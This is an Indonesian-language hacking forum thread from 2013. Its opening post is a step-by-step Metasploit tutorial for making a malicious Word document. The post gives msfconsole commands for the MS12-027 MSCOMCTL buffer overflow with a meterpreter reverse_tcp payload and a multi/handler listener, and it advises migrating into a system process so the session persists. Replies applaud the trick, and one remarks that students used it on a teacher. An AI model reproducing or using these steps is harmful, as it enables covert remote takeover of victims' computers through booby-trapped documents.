+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Payload with MS.Word document (/thread-4713.html)
Payload with MS.Word document - Clound_Carbelius - 06-25-2013
halo semua...
udah lama gw gak update di mari, sibuk skolah
ane mau curhat,sekalian share ilmu nih
Spoiler! :
tapi bagaimana cara membuat Payload berextension .doc
:-ketik di msfconsole kalian :
Quote:> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit
tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/
jika sudah siap semua,
langsung jalankan exploit multi_handler
Quote:> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit
nah,tinggal tungguin aja korban menjalankan payload tersebut
![[Image: Screenshot-3.png]](https://2.bp.blogspot.com/-0JXmXhGUFVM/Ubss3XbngbI/AAAAAAAAADc/GkNK_Bsh9OA/s1600/Screenshot-3.png)
tambahan sedikit,
begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit
segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target
![[Image: Screenshot-1.png]](https://3.bp.blogspot.com/-rzASVGUgKfw/UbstZcj2PWI/AAAAAAAAADg/nRRJLD3szV4/s1600/Screenshot-1.png)
karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system
ok,thank's sekian dari gw Clound
gak nolak di sambit cendol
RE: Payload with MS.Word document - ChelvinCesio - 06-25-2013
wahaha =)) sudah menjadi ciri khas om Clound adalah Gokill
)Nice tutor om, ijin coba :-bd :-bd
RE: Payload with MS.Word document - Clound_Carbelius - 06-25-2013
(06-25-2013, 01:07 AM)ChelvinCesio Wrote: wahaha =)) sudah menjadi ciri khas om Clound adalah Gokill
Nice tutor om, ijin coba :-bd :-bd
nama nya orang kepepet.apa aja pasti di lakuin om =))
#the power off Kepepet =))
monggo :-bd
share di mari om hasil nya
RE: Payload with MS.Word document - wine trochanter - 06-25-2013
ohh exploit ini yahh keduluan di buat
RE: Payload with MS.Word document - naice - 06-25-2013
exploit pake ms.word? gokil juga ide ente
RE: Payload with MS.Word document - Clound_Carbelius - 06-25-2013
(06-25-2013, 10:26 AM)naice Wrote: exploit pake ms.word? gokil juga ide ente
bkan ms.word di jadiin alat exploit om,kya msf \m/
maksud nya tuh file .doc nya yg di jadiin payload
tepat nya
bakdor berxtensi .doc :d
RE: Payload with MS.Word document - zee eichel - 06-25-2013
itu juga akibat guru gk mau pake antivirus bagus .. akhirnya di isengin deh ama murid2nya hahaha ... nice post bro
RE: Payload with MS.Word document - abdee_dillah - 06-25-2013
sip keren ada jebakan betman'a
RE: Payload with MS.Word document - kakus130908 - 06-25-2013
\m/ boleh juga nih idenya \m/
waktu itu ane pernah punya ide begini tapi belom ketemu prakteknya
manceb bro :-bd
RE: Payload with MS.Word document - wahyuardan - 06-25-2013
apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om